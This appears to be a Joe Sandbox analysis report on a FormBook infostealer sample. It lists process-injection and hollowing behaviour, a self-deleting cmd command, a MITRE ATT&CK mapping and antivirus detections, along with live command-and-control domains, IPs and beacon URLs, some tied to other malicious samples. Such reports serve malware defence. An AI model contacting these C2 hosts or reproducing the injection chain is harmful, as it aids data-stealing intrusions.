          Source: C:\Windows\explorer.exe | Domain query: www.plastictohydrogen.com
          Source: C:\Windows\explorer.exe | Network Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exe | Domain query: www.cartercavanaugh.com
          Source: C:\Windows\explorer.exe | Network Connect: 185.98.131.46 80
          Source: C:\Windows\explorer.exe | Network Connect: 54.147.194.143 80
          Source: C:\Windows\explorer.exe | Domain query: www.vigipharx.com
          Source: C:\Windows\explorer.exe | Domain query: www.glocp9.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.ayco.sucks
          Source: C:\Windows\explorer.exe | Domain query: www.mortgagenewsdailt.com
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\3.exe | Memory written: C:\Users\user\Desktop\3.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\3.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\3.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\3.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\3.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\3.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\3.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 830000
          Source: C:\Users\user\Desktop\3.exe | Process created: C:\Users\user\Desktop\3.exe C:\Users\user\Desktop\3.exe
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3.exe'
          Source: explorer.exe, 00000005.00000000.256260083.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.281921519.0000000001980000.00000002.00000001.sdmp, ipconfig.exe, 00000013.00000002.473898302.0000000005510000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.265742554.0000000006860000.00000004.00000001.sdmp, ipconfig.exe, 00000013.00000002.473898302.0000000005510000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.281921519.0000000001980000.00000002.00000001.sdmp, ipconfig.exe, 00000013.00000002.473898302.0000000005510000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.281921519.0000000001980000.00000002.00000001.sdmp, ipconfig.exe, 00000013.00000002.473898302.0000000005510000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

The matrix is listed per tactic (one column each); the number after a technique is the count badge shown in the report cell.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Scripting (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection (612); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (2); Process Injection (612); Deobfuscate/Decode Files or Information (1); Scripting (1); Obfuscated Files or Information (2); Software Packing (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (2); Process Discovery (2); Remote System Discovery (1); System Network Configuration Discovery (1); System Information Discovery (111); Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel (12); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

          Behavior Graph

Behavior Graph ID: 433178 | Sample: 3.exe | Start date: 11/06/2021 | Architecture: WINDOWS | Score: 100

The graph nodes, with the node numbers used in the report and the edges between them:

Node 2 (Start)
  DNS/IP: www.studiodates.com (37); www.plaquitasparamascota.com (39); 9 other IPs or domains (41)
  Signatures: Found malware configuration (51); Malicious sample detected (through community Yara rule) (53); Multi AV Scanner detection for submitted file (55); 2 other signatures (57)
  Started: 3.exe 21 (node 11)

Node 11 (3.exe)
  DNS/IP: cdn.discordapp.com 162.159.135.233, 443, 49716, 49717 CLOUDFLARENETUS United States (49)
  Signatures: Tries to detect virtualization through RDTSC time measurements (63); Injects a PE file into a foreign processes (65)
  Started: 3.exe (node 15); cmd.exe 1 (node 18)

Node 15 (3.exe)
  Signatures: Modifies the context of a thread in another process (thread injection) (73); Maps a DLL or memory area into another process (75); Sample uses process hollowing technique (77); Queues an APC in another process (thread injection) (79)
  Injected: explorer.exe (node 20)

Node 18 (cmd.exe 1)
  Started: cmd.exe 1 (node 24); conhost.exe (node 26)

Node 20 (explorer.exe, injected)
  DNS/IP: plastictohydrogen.com 185.98.131.46, 49743, 80 RMI-FITECHFR France (43); www.mortgagenewsdailt.com 81.17.18.198, 80 PLI-ASCH Switzerland (45); 7 other IPs or domains (47)
  Signatures: System process connects to network (likely due to code injection or exploit) (59); Uses ipconfig to lookup or modify the Windows network settings (61)
  Started: ipconfig.exe (node 28)

Node 24 (cmd.exe 1)
  Started: conhost.exe (node 31)

Node 28 (ipconfig.exe)
  Signatures: Modifies the context of a thread in another process (thread injection) (67); Maps a DLL or memory area into another process (69); Tries to detect virtualization through RDTSC time measurements (71)
  Started: cmd.exe 1 (node 33)

Node 33 (cmd.exe 1)
  Started: conhost.exe (node 35)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
3.exe | 59% | Virustotal |
3.exe | 51% | Metadefender |
3.exe | 76% | ReversingLabs | Win32.Infostealer.BestaFera

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
1.1.3.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.3.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.3.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.ayco.sucks/ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 | 0% | Avira URL Cloud | safe
http://www.cartercavanaugh.com/ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.plaquitasparamascota.com/ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
www.glocp9.com/ogpo/ | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.plastictohydrogen.com/ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 | 0% | Avira URL Cloud | safe
http://www.amplifierconsulting.net/ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.vigipharx.com/ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
plastictohydrogen.com | 185.98.131.46 | true | true | | unknown
studiodates.com | 107.180.44.132 | true | true | | unknown
amplifierconsulting.net | 34.102.136.180 | true | false | | unknown
cdn.discordapp.com | 162.159.135.233 | true | false | | high
plaquitasparamascota.com | 34.102.136.180 | true | false | | unknown
cartercavanaugh.com | 34.102.136.180 | true | false | | unknown
vigipharx.com | 34.102.136.180 | true | false | | unknown
indyoutlaws.com | 192.185.11.167 | true | true | | unknown
www.ayco.sucks | 54.147.194.143 | true | true | | unknown
www.mortgagenewsdailt.com | 81.17.18.198 | true | true | | unknown
www.nosequemierda.com | unknown | unknown | true | | unknown
www.plaquitasparamascota.com | unknown | unknown | true | | unknown
www.plastictohydrogen.com | unknown | unknown | true | | unknown
www.cartercavanaugh.com | unknown | unknown | true | | unknown
www.catherinelazure.com | unknown | unknown | true | | unknown
www.amplifierconsulting.net | unknown | unknown | true | | unknown
www.vigipharx.com | unknown | unknown | true | | unknown
www.indyoutlaws.com | unknown | unknown | true | | unknown
www.glocp9.com | unknown | unknown | true | | unknown
www.studiodates.com | unknown | unknown | true | | unknown

                                                  Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.ayco.sucks/ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 | true | Avira URL Cloud: safe | unknown
http://www.cartercavanaugh.com/ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 | false | Avira URL Cloud: safe | unknown
http://www.plaquitasparamascota.com/ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 | false | Avira URL Cloud: safe | unknown
www.glocp9.com/ogpo/ | true | Avira URL Cloud: safe | low
http://www.plastictohydrogen.com/ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 | true | Avira URL Cloud: safe | unknown
http://www.amplifierconsulting.net/ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 | false | Avira URL Cloud: safe | unknown
http://www.vigipharx.com/ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 | false | Avira URL Cloud: safe | unknown

                                                  URLs from Memory and Binaries

Source for every entry in this table: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp

Name | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | false | | high
http://www.fontbureau.com | false | | high
http://www.fontbureau.com/designersG | false | | high
http://www.fontbureau.com/designers/? | false | | high
http://www.founder.com.cn/cn/bThe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | false | | high
http://www.tiro.com | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | false | | high
http://www.goodfont.co.kr | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | false | URL Reputation: safe | unknown
http://www.typography.netD | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | false | | high
http://www.founder.com.cn/cn/cThe | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | false | URL Reputation: safe | unknown
http://fontfabrik.com | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | false | | high
http://www.jiyu-kobo.co.jp/ | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | false | | high
http://www.fonts.com | false | | high
http://www.sandoll.co.kr | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | false | URL Reputation: safe | unknown
http://www.sakkal.com | false | URL Reputation: safe | unknown

                                                                      Contacted IPs

                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
54.147.194.143 | www.ayco.sucks | United States | 14618 | AMAZON-AESUS | true
34.102.136.180 | amplifierconsulting.net | United States | 15169 | GOOGLEUS | false
81.17.18.198 | www.mortgagenewsdailt.com | Switzerland | 51852 | PLI-ASCH | true
162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
185.98.131.46 | plastictohydrogen.com | France | 16347 | RMI-FITECHFR | true

                                                                      General Information

                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                      Analysis ID:433178
                                                                      Start date:11.06.2021
                                                                      Start time:12:21:20
                                                                      Joe Sandbox Product:CloudBasic
Overall analysis duration: 0h 10m 37s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 3.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@14/5@14/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 34.6% (good quality ratio 31.3%)
• Quality average: 72.4%
• Quality standard deviation: 31.5%
HCA Information:
• Successful, ratio: 69%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 168.61.161.212, 13.88.21.125, 104.43.139.144, 20.82.210.154, 184.30.24.56, 2.20.142.210, 2.20.142.209, 84.53.167.113, 2.17.179.193, 20.190.160.2, 20.190.160.75, 20.190.160.134, 20.190.160.136, 20.190.160.132, 20.190.160.129, 20.190.160.69, 20.190.160.8, 20.50.102.62, 92.122.213.247, 92.122.213.194, 20.54.26.129, 92.122.145.220
                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, cdn.onenote.net.edgekey.net, www.tm.a.prd.aadg.trafficmanager.net, e12564.dspb.akamaiedge.net, wildcard.weather.microsoft.com.edgekey.net, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, tile-service.weather.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net, ams2.current.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

Time | Type | Description
12:22:06 | API Interceptor | 3x Sleep call for process: 3.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

Match | Associated Sample Name / URL | Detection | Context
54.147.194.143 | Inv3063200.exe | malicious | www.allerganacademy.sucks/vfm2/?k2MdtP=LmFdZ9gjDIx/1thg2qAIjzQWq3wditgwII2kAns7Fui9uD9OwA4ibKKgDMWgv+lmRomT&NZitYp=zL3h2V_pyz
54.147.194.143 | Sales Invoice NO CN 6739.exe | malicious | www.atlantahawks.sucks/chue/?EzutZl=3fX08rZHUH-&EhA8R=23tAecEcPN8lPSjAKWGAYBo9TuLRqN5pN+TNZjQiP5W8VE+UFQGW1PlnZKfKox5lfqrZ
54.147.194.143 | New Order.exe | malicious | www.bostonredsox.sucks/gwam/?Iry=lxg6dPe+nZwYSNNU17vceoxbNFwjbhB8pjLqYUtkOCdsIUy1dVr3af5pAhDK953TEkSh&ob30vr=S0Glx8
54.147.194.143 | INVOICE CORRECTION.png.exe | malicious | www.axawinterthur.sucks/chue/
54.147.194.143 | Swift001.exe | malicious | www.daytondailynews.sucks/gwam/?xVMtBLt0=dHil0CD4Vm8Yd4bFV13fVQ+sh0vKAzZyH2Hr0rX4756hSyETdw3IGIf6M/SoKAKDfxID&1bw=Lhe8eJi8jXTPbflp
54.147.194.143 | INVOICE NO 6573.exe | malicious | www.axawinterthur.sucks/chue/
54.147.194.143 | Shipping Doc.exe | malicious | www.cnbc.sucks/sqe3/?r6=KGMk7r6G/NNIPyfJDEPCiUC9nfst2sp0tcS4RcC9/cCtBNIGDWamBH/9pyMYJYXFNGdlq0wOpw==&rZvLVf=YL0hPBuh3Bh8NfMP
54.147.194.143 | 30 percento,pdf.exe | malicious | www.audiencetrust.sucks/kio8/?Yn=9EJc0yqOhJmNTeEQfP0wu5IVR3gXJ0EOIdYSOz5eK6mBCHAuY1EdvqSzCKm9Dfhfs4TryVa1KA==&mvKpc=V48DupphUTS4qDu
54.147.194.143 | Invoice Payment Details.exe | malicious | www.audiencetrust.sucks/kio8/?PR-Hfnn=9EJc0yqOhJmNTeEQfP0wu5IVR3gXJ0EOIdYSOz5eK6mBCHAuY1EdvqSzCJKtfu9krN66&Cd8t=9rJx809H6RL0Cr7
54.147.194.143 | Carta de pago.exe | malicious | www.audiencetrust.sucks/kio8/?_FQl64=9EJc0yqOhJmNTeEQfP0wu5IVR3gXJ0EOIdYSOz5eK6mBCHAuY1EdvqSzCJKtfu9krN66&pL3=gdnLxBrpiV
54.147.194.143 | Purchase order pdf.exe | malicious | www.craftsman.sucks/nwc9/?LX9p=vufb9ZM0L2UqzR4cq9a0Vq9xTXcRUo0aJVq1+zhILIc0v3ImCtITmP0HrsJqsFS70ieg&MnZ=GXLtz
54.147.194.143 | trasferimento bancario pdf.exe | malicious | www.craftsman.sucks/nwc9/?IToxs4h=vufb9ZM0L2UqzR4cq9a0Vq9xTXcRUo0aJVq1+zhILIc0v3ImCtITmP0Hrvp6jkCDqH3n&Bl=lHU80XfhY8y
54.147.194.143 | Order.exe | malicious | www.arjohuntleigh.sucks/fcxy/?_R-hqJ=3fI8qP&BvTl=dg6jnflzwmowH+BmV2t3WZp/Www7NAfsI2sFRw4aqtAxAcwIjQCip5fV86QCZce1VLCV
54.147.194.143 | Purchase Order#12202011.exe | malicious | www.craftsman.sucks/nwc9/?-ZeHzz4=vufb9ZM0L2UqzR4cq9a0Vq9xTXcRUo0aJVq1+zhILIc0v3ImCtITmP0Hrvl6w0OAzX3xLVqTIw==&2dB=lheDY
54.147.194.143 | TR-D45.pdf.exe | malicious | www.celebrations.sucks/gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd
54.147.194.143 | Order specs19.11.20.exe | malicious | www.chantix.sucks/nwrr/?Rxo=L6hH4NIhfjzT&cj=uGPGvmJ2JHt21s4rgOafVTq/y3pY7yC+ILF7bn+N5+KqJxZXLHbImlswjI/oLvcp6/oghs0J3A==
54.147.194.143 | DHL No_SINI0068206497.exe | malicious | www.crash.sucks/mkr/
54.147.194.143 | Remittance Scan DOC-2029293#PI207-048.exe | malicious | www.delonghi.sucks/svh9/?rPXTJx=CJfJI9r1cBD0WydEqOpYnndytqZZCXXpDqaNH0BqxvDchJy8UsetUmnvuiU2wxntZNx4hJVMVg==&Lvyt=BZO03Fr
54.147.194.143 | Payment Advice - Advice Ref[GLV824593835].exe | malicious | www.delonghi.sucks/svh9/?UN9hLV=EhL05l&9rQhv2=CJfJI9r1cBD0WydEqOpYnndytqZZCXXpDqaNH0BqxvDchJy8UsetUmnvuiY2jhruAdxu
81.17.18.198 | PI1942100023.exe | malicious | www.bradforrexchange.com/3edq/?IRrDPny=jO6sWaazfWUScqk/UMZ2V9vSXHj7s0GXSNY0VsmNmZeYB4f0QdniyMTma+6l76TklIvb&Bl=lHLLrt6PJPF
81.17.18.198 | POSWM240521.exe | malicious | www.nononenseforex.com/m3rc/?CRi=sQslGx3wRkkS8QwcsHXSsetwWwy5zDYh0aNt3+ZE5+5eF57RcdKe2rWRFuGVJFeZl5Wh&QZ3=DnJpqlx8pzo8Q0
81.17.18.198 | PO.exe | malicious | www.healtybenenfitsplus.com/u8nw/?YrCLWRfh=6ud/dqIydDQUuBxLTd+61jR+UOTUyrr5/cODbe6ZCgy6zmegus8kaEMTI16gihWe1lhH&Dzut_N=3f-4
81.17.18.198 | PO09641.exe | malicious | www.basictrainningphothos.com/or4i/?UL=ER-POL&r6t0=kC1u0IXPsBjzVnGc1WAO7pfcEkTuC4G65QDl1LxxWxvdcIk0AsappLtc+Rt99gFPIW/ptGYUxQ==
81.17.18.198 | cks.exe | malicious | www.healtybenenfitsplus.com/u8nw/?f0=6ud/dqIydDQUuBxLTd+61jR+UOTUyrr5/cODbe6ZCgy6zmegus8kaEMTI12ZuA6eij9WcYoi0w==&6l6x=E4ClVdU
81.17.18.198 | PO20210429.xlsx | malicious | www.hawkspremierfhc.com/8u3b/?Mz=ltx0qfi0x45&WBZXQ8j=3iKzWC9LZujcEqPpbQv6LxvAb3gxPt2YPK6xKboPPZ94xOFNl7wSmfmIFDBjFiSqNNfP+A==
81.17.18.198 | s6G3ZtvHZg.exe | malicious | www.moretuantired.com/iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp
81.17.18.198 | 4oItdZkNOZ.exe | malicious | www.xn--ol-xia.com/hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py
81.17.18.198 | gqnTRCdv5u.exe | malicious | www.ololmychartlogin.com/p2io/?K81d7=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9Ot1G4m5E5eG&uTrL=Apdlbf
81.17.18.198 | newordermx.exe | malicious | www.xn--ol-xia.com/llc/?bn=6gTrs3WlX/dQ4h1iHI1SnxJQFS0nsC7P3gjdYD5m5wbZexpWY5yyX5EF1urN19KpUayT&vTd8F=LJBxmfw
81.17.18.198 | MV WAF PASSION.exe | malicious | www.moretuantired.com/iu4d/?EZA0pp=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hic2nNTYz3pD&GzrX9=Axo834d
81.17.18.198 | 9tRIEZUd1j.exe | malicious | www.thesahwfam.com/aqu2/?5j=5EjXvdr19C9mZVkY3fKTgvDOgP0S6WDmsKJe/OA2LcJULTMy4Vts0y1eMnfuBzO+T46m&_P=2dhtaH9
81.17.18.198 | IMG_7189012.exe | malicious | www.comriv.com/mt6e/?DVBl=FwXaSa09vNWpKPjUESqBerftMc+dq/hFoZPV5cdNpA4Dw8Ua5k46pvZmfTcPNIMbsRBT&T8SH=pFNpKT28jFN454KP
81.17.18.198 | TBKK E12101010.xlsx | malicious | www.stonescapes1.com/de92/?rDK4=XrxlCh&SH6=FMDFc6rOlp10jaqop6r3BpbflKlZCzzEN1iblkluZIOvebj5bOK3jo1m1AppDhOD0Sh+SQ==
81.17.18.198 | PO20210120.exe | malicious | www.morkiehouse.com/knb/?5jR=5f4+S7dOxIgdr5BGwWsz6ruKwi5Cwc4O4q4+fZzwW2WbMhIr+9/Ek3SgS9//XL2PJatT&cxol4=yhvxYFE8aN4
81.17.18.198 | SKM_C221200706052800n.exe | malicious | www.comunityassn.com/s9zh/?jrTDhRz=tknWlnMldXC7iCBNErlol2ZWcFkzI66RNwK0SX0HwmntnkBHipaMqEQDNLo3y97V5yepxxmpfQ==&J2JDYn=DxoPetRhujMT
81.17.18.198 | SHEXD210117S_ShippingDocument_DkD.xlsx | malicious | www.stonescapes1.com/de92/?gb20XB=FMDFc6rOlp10jaqop6r3BpbflKlZCzzEN1iblkluZIOvebj5bOK3jo1m1AppDhOD0Sh+SQ==&pBU=HzuD_
